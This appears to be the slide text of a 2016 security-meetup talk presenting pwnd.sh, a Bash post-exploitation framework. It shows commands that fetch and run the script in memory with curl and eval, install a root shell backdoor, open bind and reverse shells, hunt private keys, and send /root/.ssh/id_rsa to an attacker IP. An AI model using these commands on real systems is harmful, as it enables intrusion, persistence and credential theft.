pwnd.sh - A post exploitation tool written entirely in bash. Presented in Null meet on 17/12/16

1. PWND.sh
Post Exploitation Framework

2. Agenda
SCENARIO: Have already compromised a Linux machine

What’s next after exploiting

Different functionalities of pwnd.sh

Q/A

3. ./about_me.py
[+] Got name : Chandrapal
[+] Website : chandrapal.me
[+] Founder of : Hack with GitHub
[+] Social Accounts : @bnchandrapal
@HackwithGithub
[-] Life :
Traceback (most recent call last) :
File “about_me.py”, line 150, in <module>
TypeError: Can’t convert ‘infosec’ object to developer implicitly

4. Author
Itzek Kotler (@itzikkotler)
CTO & Co-founder @ SafeBreach
http://ikotler.org

5. What plans in Post Exploitation Phase
3 possible things:
●
Further penetrate into Network / Endpoints
●
Get a firmer foothold on the Network / Endpoints
●
Start Exfiltrating Data out of the Network / Endpoints

6. About the tool
●
Newly released
●
Easy as it is written in BASH
●
Interactive and allows to create custom scripts
●
License: 3-Clause BSD
●
Both In-Memory and On-Disk deployment available
●
Pipeline integrates pwnd.sh with other programs also

7. How can I get it ?
> git clone https://github.com/SafeBreach-Labs/pwndsh.git
> cd pwndsh

8. Why Bash and not Python / Perl / Ruby ?
●
Same Bash for different Platforms (Mac, Linux, etc) and different
architectures (x86, x64)
●
It is the default shell on most systems
●
There is socket programming in Bash (--enable-net-redirections)
●
You cannot fallback to Bash from Python, Perl, etc but you can
UPGRADE to Python, Perl, etc from Bash

9. Dependencies, or not to be Depended?
●
No:
– Consistent functionality across different Platforms, CPUs etc.
– Smaller and simpler code base
●
Yes:
– Don't reinvent the wheel
– Everything a Dependency in Shell Terms (ls, cat, etc)
(Good coders create, Great coders reuse)
PWND.SH – built with least amount of dependencies

10. Why In-memory?
●
Constraints found:
– Filesystem is readonly
– “No space left on device”
Solution: In-memory loading
●
Works even if the Filesystem is mounted to be Read-only
●
Multiple Versions can co-exists (in Multiple Shells)
●
Disappears after Reboot

11. Let’s Start

12. Metasploitable
192.168.70.101
Ubuntu
Find it
It’s me
192.168.70.100
Scenario :

13. In-Memory Loading Method #1
X=`curl -fsSL
"https://raw.githubusercontent.com/SafeBreac
h-Labs/pwndsh/master/bin/pwnd.sh"`
eval "$X"

14. What if the system is on
Intranet without
Internet ?
What if the system is in
Internet Censored
country where GitHub is
blocked ?

15. In-Memory Loading Method #2
● On source computer
curl -fsSL
"https://raw.githubusercontent.com/SafeBreach-
Labs/pwndsh/master/bin/pwnd.sh"
< Ctrl+Shift+C >
● On destination computer
X=”<Ctrl+V>”
eval “$X”

16. On-Disk Loading Method
> curl -OfsSL
"https://raw.githubusercontent.com/SafeBrea
ch-Labs/pwndsh/master/bin/pwnd.sh"
> source pwnd.sh

18. Scanning a Host
(pwnd) $ portscanner 192.168.2.132 22/tcp

19. Scanning Networks
(pwnd)$ for ip in $(seq 1 254); do
portscanner 192.168.0.$ip 123/udp; done

20. Local Backdoor Example
(pwnd)$ install_rootshell
# Remember to invoke rootshell with ‘-p’

21. Remote Backdoor Example
(pwnd)$ bindshell 1234
# Connect to host at 1234/tcp for rootshell

22. Remote Backdoor Example #2
# On 192.168.2.1 run: nc –l 1234
(pwnd)$ reverseshell 192.168.2.1 1234

23. Searching for Goodies
(pwnd)$ hunt_privkeys

24. Exfil Example
# On attacker machine run: nc –l <port>
(pwnd)$ cat /root/.ssh/id_rsa | base64 |
over_socket <attacker IP> <port>

25. Plugin Support
●
You can create plugins and add you to the project
●
All you need is:
– GitHub account
– Bash knowledge
– Time

26. Q&A
We have
HACKED WITH GITHUB

27. References
●
https://github.com/SafeBreach-Labs/pwndsh
●
http://www.ikotler.org/JustGotPWND.pdf
●
https://www.youtube.com/watch?v=kWU-fDv2wjM

28. Thank You